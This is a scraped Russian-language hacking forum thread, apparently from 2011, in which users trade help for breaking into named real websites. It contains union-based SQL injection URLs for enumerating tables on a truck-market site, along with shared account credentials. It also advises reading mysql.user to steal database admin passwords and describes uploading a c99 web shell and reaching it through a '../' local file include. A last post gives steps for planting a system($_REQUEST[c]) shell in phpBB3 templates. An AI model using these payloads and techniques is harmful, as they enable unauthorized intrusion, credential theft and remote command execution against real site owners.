 |
|
14.03.2011, 00:42
|
|
Познающий
Регистрация: 20.01.2009
Сообщений: 48
С нами:
9109061
Репутация:
9
|
|
Имеется sqli в mssql без вывода ошибки.
Сайт: www.truck market.ru
Перед проведением атаки следует вторизоваться тут: http://www.truckmarket.ru/enter.php. Например по этому акку: login:a1840198 pass:a1840198
sqli:
Сообщение от None
/reg.php?id=355569+and+1=1
По логике: если запрос верен - в текстбокстах отображается уже имеющаяся инфа.
Ступор на получении списка таблиц. Получаем одну так:
Сообщение от None
/reg.php?id=355569+union+select+top+1+1,2,3,4,5,6,7 ,cast%28table_name+as+binary%29,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31, 32,33,34+FROM+INFORMATION_SCHEMA.TABLES
Далее пробую сначала брать следующию так:
Сообщение от None
/reg.php?id=355569+union+select+top+1+1,2,3,4,5,6,7 ,cast%28table_name+as+binary%29,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31, 32,33,34+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABL E_NAME%3E%27mb_spare_ua%27
Сообщение от None
/reg.php?id=355569+union+select+top+1+1,2,3,4,5,6,7 ,cast%28table_name+as+binary%29,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31, 32,33,34+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABL E_NAME%3E%27mboards%27
Но удается выудить только три, потом идет повтор:
Сообщение от None
mb_spare_ua
mboards
MbTopics_ForDel
MbTopics_ForDel
...
Сообщение от None
/reg.php?id=355569+union+select+top+1+1,2,3,4,5,6,7 ,cast%28table_name+as+binary%29,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31, 32,33,34+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABL E_NAME+NOT+IN+('mb_spare_ua','mboards','ATIForums_ Forum')
-- ATIForums_Forum
Опять повтор. Почитал доки. select top - возвращает случайныую запись. Умельцы как-то убирают случайность, добовляя в конец order+by+. Но я не докурил как =(
Подставляя случайные слова в первый методе смог получить вот такой список таблиц:
Сообщение от None
MbTopics_ForDel
WebService
WebServiceClient
WindRose
mb_spare_ua
mboards
ATIForums_Forum
Кузова
Марки транспорт
RegionCodes
WarnTypes
MSP_TIMEPHASED_DATA --(Вывело MSP_TIMEPHASED_, но гугл указал что это дефолт таблица MSP_TIMEPHASED_DATA)
ways
waysinfo
Как вытащить все таблицы? Мне бы увидеть пример имуляции limit, вывести колонки и инфу думаю смогу сам.
p.s
Проблема с данной уязвимостью, уже постилась на rdot.org
Но 2ва дня не кто помочь не может. |
|
|
14.03.2011, 00:43
|
|
Познающий
Регистрация: 19.02.2011
Сообщений: 32
С нами:
8014646
Репутация:
-3
|
|
Как можно это обработать на "чистый" лист?
http://www.elitecrownmoldings.com/home.php?cat=6
кстати, тут походу у пользователя есть права на INSERT =)
и еще вопросик, как можно узнать привилегии пользователя mysql, ну и других дб?
|
|
|
|
14.03.2011, 03:19
|
|
Новичок
Регистрация: 13.04.2010
Сообщений: 0
С нами:
8462565
Репутация:
0
|
|
залили шелл через pma
узнал путь /var/lib/mysql/tmp/c99.php
но теперь как шелл то сам юзануть?
|
|
|
|
14.03.2011, 03:20
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 0
С нами:
10992741
Репутация:
0
|
|
Сообщение от foozzi
залили шелл через pma
узнал путь /var/lib/mysql/tmp/c99.php
но теперь как шелл то сам юзануть?
инклюд локальный, больше никак ...
|
|
|
|
14.03.2011, 03:24
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
С нами:
9846041
Репутация:
1177
|
|
Сообщение от asql
Как можно это обработать на "чистый" лист?
http://www.elitecrownmoldings.com/home.php?cat=6
кстати, тут походу у пользователя есть права на INSERT =)
и еще вопросик, как можно узнать привилегии пользователя mysql, ну и других дб?
Могу сказать, что INSERT-иньекцию провести не удасться, т.к. в запрос входит путь, который подделать\обрезать не возможно.
Код:
/product.php?prod'uctid=256 => INSERT INTO xcart_stats_pages(page) VALUES('/product.php?prod'uctid=256')
/pro'duct.php?productid=256 => Not Found
Мдя уж, забавно
По поводу привилегий:
Максимальный привелегии, что у тебя могут быть (которые помогаю в SQLi) это доступ на чтение mysql.user, чтобы узнать пасс админа MySQL и подключиться удаленно\к phpMyAdmin, если есть, ну или пробрутить FTP\SSH.
Ну или file_priv, что тебе позволяет читать файлы, а при отсутсвие mq, то и заливать файлы
Ну и обычно если есть доступ к mysql.user, то и есть доступ в file_priv.
Ну и по поводу раскручивания данной инъекции.
Запрос выдает ошибку только при кавычке подставленной, если ее нет, то все отбрасываеться.
Попробуй избавиться от ошибки при кавычке.
Сообщение от foozzi
залили шелл через pma
узнал путь /var/lib/mysql/tmp/c99.php
но теперь как шелл то сам юзануть?
Ты залил шелл в /tmp, в котором храняться файлы сессий, к которому нету доступа из под веба, то есть никак не прочитать (ну если нету LFI\RFI). Попробуй просканить сайт на директории, посмотри в каких папках лежат картинки\js\css \etc и пробуй залить во все эти диры, ведь я, надеюсь, у тебя есть путь к сайту? Если нету то читай мой пост пару страниц ниже...
|
|
|
|
14.03.2011, 03:26
|
|
Новичок
Регистрация: 13.04.2010
Сообщений: 0
С нами:
8462565
Репутация:
0
|
|
Сообщение от Lijzer
инклюд локальный, больше никак ...
нашол путь тот который надо
http://www.xxx.ru/show.php?f=../../../../var/lib/mysql/c99.php
но там пустая страница, тоесть меню сайта и шапка есть а там где контент пусто
пробовал залить в js (такая папка есть) но не могу точный путь найти к ней, читал etc/passwd там ничего такого нет
|
|
|
|
14.03.2011, 03:58
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 0
С нами:
10992741
Репутация:
0
|
|
Сообщение от foozzi
нашол путь тот который надо
http://www.xxx.ru/show.php?f=../../../../var/lib/mysql/c99.php
но там пустая страница, тоесть меню сайта и шапка есть а там где контент пусто
пробовал залить в js (такая папка есть) но не могу точный путь найти к ней, читал etc/passwd там ничего такого нет
DirBuster тебе в помощь...
|
|
|
|
14.03.2011, 14:02
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 0
С нами:
10992741
Репутация:
0
|
|
как можно залить шелл в PhpBB версии 3.0.8 имея доступ в админку
Гугл не помог
|
|
|
|
14.03.2011, 14:18
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 0
С нами:
10992741
Репутация:
0
|
|
Сообщение от noviyuser
как можно залить шелл в PhpBB версии 3.0.8 имея доступ в админку
Гугл не помог
google.ru > Заливка шелла phpbb3 site:forum.antichat.ru
google.ru > Заливка шелла phpbb3 site:rdot.org
гуглим правильно (с)
|
|
|
|
14.03.2011, 14:19
|
|
Новичок
Регистрация: 01.08.2009
Сообщений: 12
С нами:
8830468
Репутация:
0
|
|
Заливка шела через темплейты в phpBB3 (необходим доступ в админку).
1. Разрешаем выполнение пхп в темплейтах. Устанавливаем галочку в Основные настройки(General Settings) -> Настройки безопасности(Security Settings) -> Разрешить выполнение пхп в темплейтах (Allow php in templates).
2. Далее в стилях выбираем необходимый темплейт и прописываем необходимый пхп код в следующей конструкции:
system($_REQUEST[c]);
Источник |
|
|
|
|
|
|
Предыдущая тема
Следующая тема
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
